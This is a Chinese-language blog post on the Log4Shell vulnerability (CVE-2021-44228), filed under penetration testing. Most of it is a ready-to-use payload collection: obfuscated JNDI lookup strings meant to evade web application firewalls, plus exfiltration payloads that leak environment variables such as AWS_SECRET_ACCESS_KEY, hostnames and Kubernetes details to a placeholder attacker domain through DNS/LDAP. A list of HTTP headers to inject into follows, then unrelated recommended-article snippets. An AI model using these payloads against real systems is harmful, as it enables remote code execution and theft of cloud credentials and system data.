Apache Log4j RCE Waf Bypass & Data Exfiltration Payloads

最新推荐文章于 2024-12-24 22:55:25 发布
最新推荐文章于 2024-12-24 22:55:25 发布
阅读量6.5k 收藏 4
点赞数 10
分类专栏: Penetration Testing 文章标签: apache java Log4j
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44309905/article/details/121956392
版权

简介

CVE-2021-44228(又名 log4shell)是 Apache Log4j 库中的一个远程代码执行漏洞,该库是一种基于 Java 的日志记录工具,广泛用于世界各地的应用程序中。此漏洞允许可以控制日志消息的攻击者执行从攻击者控制的服务器加载的任意代码——我们预计大多数使用 Log4j 库的应用程序都将满足此条件。

Apache Log4j2 <=2.14.1 在配置、日志消息和参数中使用的 JNDI 功能不能防止攻击者控制的 LDAP 和其他 JNDI 相关端点。当启用消息查找替换时,可以控制日志消息或日志消息参数的攻击者可以执行从 LDAP 服务器加载的任意代码。从 log4j 2.15.0 开始,默认情况下已禁用此行为。受影响的版本是2.0 <= Apache log4j <= 2.14.1

工作原理

在这里插入图片描述

  • 攻击者将 JNDI 查找/有效负载插入可能被记录的请求的任何位置。(例如:${jndi:ldap://domain.com/j})
  • 负载被传递到 log4j 以进行日志记录。
  • Log4j 插入字符串并查询恶意 ldap 服务器。
  • ldap 服务器以包含恶意 java 类的目录信息进行响应。
  • Java 反序列化或下载恶意 J​​ava 类并执行它。

Waf Bypass & Data Exfiltration Payloads

${jndi:ldap://domain.com/j} 
${jndi:ldap:/domain.com/a} 
${jndi:dns:/domain.com} 
${jndi:dns://domain.com/ j} 
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${: :-i}://domain.com/j} 
${${::-j}ndi:rmi://domain.com/j} 
${jndi:rmi://domainldap.com/j} 
${ ${lower:jndi}:${lower:rmi}://domain.com/j} 
${${lower:${lower:jndi}}:${lower:rmi}://domain.com/j } 
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://domain.com/j} 
${${lower:j}${upper: n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://domain.com/j} 
${jndi:${lower:l}${ lower:d}a${lower:p}://domain.com} 
${${env:NaN:-j}ndi${env:NaN:-:}${env:NaN:-l}dap$ {env:NaN:-:}//domain.com/a} 
jn${env::-}di: 
jn${date:}di${date:':'}
j${k8s:k5:-ND}i${sd:k5:-:} 
j${main:\k5:-Nd}i${spring:k5:-:} 
j${sys:k5:-nD }${lower:i${web:k5:-:}} 
j${::-nD}i${::-:} 
j${EnV:K5:-nD}i: 
j${lower:Nd }i${uPper::}

如果您能 ping 回但它是不可利用的,则以下有效负载可用于数据渗漏。

${jndi:ldap://${env:user}.domain.com/exp} 
${jndi:dns://${hostName}.domain.com/a} 
${jndi:dns://${ env:COMPUTERNAME}.domain.com/a} 
${jndi:dns://${env:USERDOMAIN}.domain.com/a} 
${jndi:dns://${env:AWS_SECRET_ACCESS_KEY.domain.com/ a} 
${jndi:ldap://${ctx:loginId}.domain.com/j} 
${jndi:ldap://${map:type}.domain.com/j} 
${jndi:ldap: //${filename}.domain.com/j} 
${jndi:ldap://${date:MM-dd-yyyy}.domain.com/j} 
${jndi:ldap://${docker: containerId}.domain.com/j} 
${jndi:ldap://${docker:containerName}.domain.com/j} 
${jndi:ldap://${docker:imageName}.domain.com/j } 
${jndi:ldap://${env:USER}.domain.com/j} 
${jndi:ldap://${event:Marker}.domain.com/j} 
${jndi:ldap:/ /${mdc:UserId}.domain.com/j}
${jndi:ldap://${java:runtime}.domain.com/j} 
${jndi:ldap://${java:vm}.domain.com/j} 
${jndi:ldap:// ${java:os}.domain.com/j} 
${jndi:ldap://${jndi:logging/context-name}.domain.com/j} 
${jndi:ldap://${hostName} .domain.com/j} 
${jndi:ldap://${docker:containerId}.domain.com/j} 
${jndi:ldap://${k8s:accountName}.domain.com/j} 
$ {jndi:ldap://${k8s:clusterName}.domain.com/j} 
${jndi:ldap://${k8s:containerId}.domain.com/j} 
${jndi:ldap://$ {k8s:containerName}.domain.com/j} 
${jndi:ldap://${k8s:host}.domain.com/j} 
${jndi:ldap://${k8s:labels.app} domain.com/j} 
${jndi:ldap://${k8s:labels.podTemplateHash}.domain.com/j} 
${jndi:ldap://${k8s:masterUrl}.domain.com/j}
${jndi:ldap://${k8s:namespaceId}.domain.com/j} 
${jndi:ldap://${k8s:namespaceName}.domain.com/j} 
${jndi:ldap:// ${k8s:podId}.domain.com/j} 
${jndi:ldap://${k8s:podIp}.domain.com/j} 
${jndi:ldap://${k8s:podName}.domain .com/j} 
${jndi:ldap://${k8s:imageId}.domain.com/j} 
${jndi:ldap://${k8s:imageName}.domain.com/j} 
${jndi :ldap://${log4j:configLocation}.domain.com/j} 
${jndi:ldap://${log4j:configParentLocation}.domain.com/j} 
${jndi:ldap://${spring :spring.application.name}.domain.com/j} 
${jndi:ldap://${main:myString}.domain.com/j} 
${jndi:ldap://${main:0} domain.com/j} 
${jndi:ldap://${main:1}.domain.com/j} 
${jndi:ldap://${main:2}.domain.com/j} 
${ jndi:ldap://${main:3}.domain.com/j}
${jndi:ldap://${main:4}.domain.com/j} 
${jndi:ldap://${main:bar}.domain.com/j} 
${jndi:ldap:// ${name}.domain.com/j} 
${jndi:ldap://${marker}.domain.com/j} 
${jndi:ldap://${marker:name}.domain.com/j } 
${jndi:ldap://${spring:profiles.active[0].domain.com/j} 
${jndi:ldap://${sys:logPath}.domain.com/j} 
${jndi :ldap://${web:rootDir}.domain.com/j}

Check these headers

Accept-Charset
Accept-Datetime
Accept-Encoding
Accept-Language
Authorization
Cache-Control
Cf-Connecting_ip
Client-Ip
Contact
Cookie
DNT
Forwarded
Forwarded-For
Forwarded-For-Ip
Forwarded-Proto
From
If-Modified-Since
Max-Forwards
Origin
Originating-Ip
Pragma
Referer
TE
True-Client-IP
True-Client-Ip
Upgrade
User-Agent
Via
Warning
X-ATT-DeviceId
X-Api-Version
X-Att-Deviceid
X-CSRFToken
X-Client-Ip
X-Correlation-ID
X-Csrf-Token
X-Do-Not-Track
X-Foo
X-Foo-Bar
X-Forward-For
X-Forward-Proto
X-Forwarded
X-Forwarded-By
X-Forwarded-For
X-Forwarded-For-Original
X-Forwarded-Host
X-Forwarded-Port
X-Forwarded-Proto
X-Forwarded-Protocol
X-Forwarded-Scheme
X-Forwarded-Server
X-Forwarded-Ssl
X-Forwarder-For
X-Frame-Options
X-From
X-Geoip-Country
X-HTTP-Method-Override
X-Http-Destinationurl
X-Http-Host-Override
X-Http-Method
X-Http-Method-Override
X-Http-Path-Override
X-Https
X-Htx-Agent
X-Hub-Signature
X-If-Unmodified-Since
X-Imbo-Test-Config
X-Insight
X-Ip
X-Ip-Trail
X-Leakix
X-Originating-Ip
X-ProxyUser-Ip
X-Real-Ip
X-Remote-Addr
X-Remote-Ip
X-Request-ID
X-Requested-With
X-UIDH
X-Wap-Profile
X-XSRF-TOKEN
Authorization: Basic 
Authorization: Bearer 
Authorization: Oauth 
Authorization: Token
Log4j2 漏洞检测工具清单
01-17 1万+
距离Log4j2漏洞公开已经过去一个月了,它所造成的严重影响已经不需要我们重复提及了。随着时间的推移,新的漏洞会不断出现,旧的漏洞会不断消失,而这个Log4j2中的RCE漏洞可能需要好几年...
Apache_Log4j2_RCE漏洞复现
Blue的博客
12-14 5141
漏洞描述: Apache Log4j2 是一款开源的 Java 日志记录工具,大量的业务框架都使用了该组件。如:Apache Struts2、Apache Solr、Apache Druid、Apache Flink等。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过程中,并未对输入进行严格的判断,从而造成漏洞的发生。 影响范围: Apache Log4j 2.x &lt; 2.15.0-rc2 漏洞复现 1.环境搭建
Log4j bypass 大全
yggcwhat
04-26 1098
Log4j bypass 大全
Apache Log4j RCE Waf Bypass &amp; Data Exfiltration Payloads_log4j bypass
ccc6553584的博客
04-17 695
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。(img-iNlPIltG-1713299589176)]的资料的朋友,可以添加V获取:vip204888 (备注网络安全)**因篇幅有限,仅展示部分资料。
【WEB安全】Log4j Bypass WAF Payloads
qq_42322144的博客
12-14 6139
Log4j Bypass WAF Payloads ${jndi:ldap://127.0.0.1:1389/ badClassName} ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} ${${::-j}ndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit} ${jndi:rmi:
vulhub log4j2漏洞复现与CTFHub Bypass disable_function靶场
最新发布
weixin_61587991的博客
12-24 389
开启题目,打开链接,连接蚁剑。5.进入目录后发现.antproxy.php,重新连接,绕过成功。3.发现php文件重新连接,进入终端,获取flag。2.选择插件成功后,进入终端获取flag。2.选择插件,进入终端,获取flag。2.选择插件,进入终端,获取flag。1.开启题目,复制链接,连接蚁剑。选择插件,进入终端,获取flag。选择插件,进入终端,获取flag。选择插件,进入终端,获取flag。选择插件,进入终端,获取flag。选择插件,进入终端,获取flag。2.复制链接,进入蚁剑连接。
Apache Log4j2-RCE-CVE-2021-44228
Have_a_great_day的博客
05-28 422
Apache Log4j通过定义每一条日志信息的级别能够更加细致地控制日志生成地过程,受影响地版本中纯在JNDI注入漏洞,导致日志在记录用户输入地数据时,触发了注入漏洞,该漏洞可导致远程代码执行。将构造的rmi和ldap按次放入 jndi: 后。ldap是协议,后面的地址为dns地址。使用JNDIExploit进行漏洞利用。​ log4j支持JNDI协议。访问如下url,查看dns回显。监听成功,拿到了管理员权限。可以看到发生了dns回显。进行base64编码。
LOG4J RCE 漏洞分享与自查.pdf
12-15
LOG4J RCE 漏洞分享与自查 Log4j RCE 漏洞是近期爆发的一种高危漏洞,它影响了全球许多业务线,原因在于引入的 Log4j2 2.10.0 版本中存在的漏洞。本文将详细介绍 Log4j RCE 漏洞的成因、漏洞复现、检测方法和解决...
apache-log4j-2.16.0-bin.rar
12-17
Apache Log4j2是一款广泛使用的Java日志框架,它允许应用程序记录各种运行时信息,以帮助开发者调试问题、监控系统性能以及追踪安全事件。然而,2021年底,一个严重漏洞被发现,被称为&ldquo;Log4Shell&rdquo;或CVE-2021-44228...
Bugku WEB Apache Log4j2 RCE
qq_41696858的博客
12-13 2081
bugku最近上新了一题log4j2的题,紧跟时代,刷一刷 先简单说一下这个漏洞的原理吧,本质是JNDI注入 需要说的是,这题需要弹VPS,也就是你得有公网IP 通过构造形如${jndi:ldap:}或者${jndi:rmi}之类的恶意payload,可以造成任意命令执行漏洞 防护的常用思路:更新apache2 log4j2版本到2.15以上 一般来说可能造成此漏洞的API包括但不限于logger.info(),logger.error() 具体的调用链可以看这篇https://www.anquanke.c
火爆全网的Log4j 漏洞复现GetShell
柠檬i的博客
12-26 8425
Apache Log4j2 JNDI注入漏洞(CVE-2021-44228),可以任意命令执行
封神台Apache Log4j任意代码执行复现踩坑到复现成功版
JACKBREAK的博客
05-19 1227
log4jApache的一个开源项目,是一个基于Java的日志记录框架。Log4j2是log4j的后继者,被大量用于业务系统开发,记录日志信息。很多互联网公司以及耳熟能详的公司的系统都在使用该框架。Apache Log4j2 组件在开启了日志记录功能后,凡是在可触发错误记录日志的地方,插入漏洞利用代码,即可利用成功。特殊情况下,若该组件记录的日志包含其他系统的记录日志,则有可能造成间接投毒。通过中间系统,使得组件间接读取了具有攻击性的漏洞利用代码,亦可间接造成漏洞触发。
log4j RCE 漏洞
b10d9的博客
12-19 4197
漏洞概述 记录本次log4j可以远程命令执行的漏洞。 CVE-2021-44228(log4shell):受影响版本:2.0-beta9(2013年9月发布)-2.14.1(2021年3月发布) CVE-2021-45046:受影响版本: 2.0-beta9 to 2.15.0, excluding 2.12.2 log4j是一款基于java的日志工具,是Apache logging server的一部分,是使用非常广泛的一种java日志框架,所以受影响范围极广。 漏洞原理 本次漏
Vector关于Apache Log4Shell CVE-2021-45105,CVE-2021-45046,CVE-2021-44228 的安全漏洞配合与修复全面详解
Polelink北汇信息的博客
12-30 3391
Apache Log4j2 是一个基于 Java 的日志记录开源组件。近日,Log4j2 被爆出现安全漏洞,攻击者可以通过向易受攻击的服务器或应用程序发送操纵请求来利用安全漏洞。Vector 德国PREEvison产品团队已经通过官网和客户管理系统及时通知客户,有关PREEvision中使用的软件组件的严重安全漏洞“Log4Shell”CVE-2021-44228,说明如下:
Apache Log4j任意代码执行高危漏洞远程批量检测脚本(脚本为初版,未经过测试)
weixin_48170459的博客
12-10 2547
连续工作了十二天,本来想着周五能轻松一点,结果来了这个漏洞,要检测一大批资产,看了一下复现方法,然后写了个脚本检测,利用dnslog回显检测,不过只是单纯post和get payload而已。然后,,,扫不出来,只能手工了。后续有环境在修改,读者也可自行修改,循环遍历一下参数字典。 import requests from urllib.parse import quote url="http://dnslog.cn/getdomain.php" url1="http://dnslog.cn/getreco
【BurpSuite】插件开发学习之Log4shell
HWHXY的博客
08-20 1332
最近有些工作要接触到安卓开发,正好老本行Burpsuite中也有java开发的地方想学习,也正好可以看看插件的原理,因此有了下面的文章。
log4j2实战复现
qq_41860201的博客
02-11 4743
去年爆出的log4j2漏洞,写一个实战利用的复现笔记,找了几个靶场作为复现靶机。 一、靶场地址:https://hack.zkaq.cn/battle/target?id=5a768e0ca6938ffd 靶场环境: 环境是: SpringBoot版本 2.6.1 log4j版本 2.14.1 java8 先抓个登录包,看一下参数 username和password参数中尝试jndi注入 2、用自己的vps开启ldap和web服务,这里直接使用工具JNDIExploit.v1.2 ..
探索Apache Log4Shell漏洞:一个深度指南
gitblog_00079的博客
05-30 341
探索Apache Log4Shell漏洞:一个深度指南 awesome-log4shellAn Awesome List of Log4Shell resources to help you stay informed and secure! ????项目地址:https://gitcode.com/gh_mirrors/aw/awesome-log4shell 项目介绍 在网络安全的风暴中心,有一个...
Log4j远程代码执行漏洞
派大星的博客
09-21 2622
Log4j远程执行漏洞原理分析
react hooks 详解
07-17
React Hooks 是 React 16.8 中新增的特性,它可以让你在函数组件中使用 state、生命周期钩子等 React 特性。使用 Hooks 可以让你写出更简洁、可复用且易于测试的代码。 React Hooks 提供了一系列的 Hook 函数,包括 useState、useEffect、useContext、useReducer、useCallback、useMemo、useRef、useImperativeHandle、useLayoutEffect 和 useDebugValue。每个 Hook 都有特定的用途,可以帮助你处理不同的问题。 下面是 React Hooks 的一些常用 Hook 函数: 1. useState useState 是最常用的 Hook 之一,它可以让你在函数组件中使用 state。useState 接受一个初始状态值,并返回一个数组,数组的第一个值是当前 state 值,第二个值是更新 state 值的函数。 ``` const [count, setCount] = useState(0); ``` 2. useEffect useEffect 可以让你在组件渲染后执行一些副作用操作,比如订阅事件、异步请求数据等。useEffect 接受两个参数,第一个参数是一个回调函数,第二个参数是一个数组,用于控制 useEffect 的执行时机。 ``` useEffect(() =&gt; { // 这里可以执行副作用操作 }, [dependencies]); ``` 3. useContext useContext 可以让你在组件树中获取 context 的值。它接受一个 context 对象,并返回该 context 的当前值。 ``` const value = useContext(MyContext); ``` 4. useRef useRef 可以让你在组件之间共享一个可变的引用。它返回一个对象,该对象的 current 属性可以存储任何值,并在组件的生命周期中保持不变。 ``` const ref = useRef(initialValue); ref.current = value; ``` 5. useCallback useCallback 可以让你缓存一个函数,以避免在每次渲染时都创建一个新的函数实例。它接受一个回调函数和一个依赖数组,并返回一个 memoized 的回调函数。 ``` const memoizedCallback = useCallback(() =&gt; { // 这里是回调函数的逻辑 }, [dependencies]); ``` 6. useMemo useMemo 可以让你缓存一个计算结果,以避免在每次渲染时都重新计算。它接受一个计算函数和一个依赖数组,并返回一个 memoized 的计算结果。 ``` const memoizedValue = useMemo(() =&gt; computeExpensiveValue(a, b), [a, b]); ``` 以上就是 React Hooks 的一些常用 Hook 函数,它们可以帮助你更好地处理组件状态、副作用、上下文和性能优化等问题。
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李白你好

年轻人,少吐槽,多搬砖

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值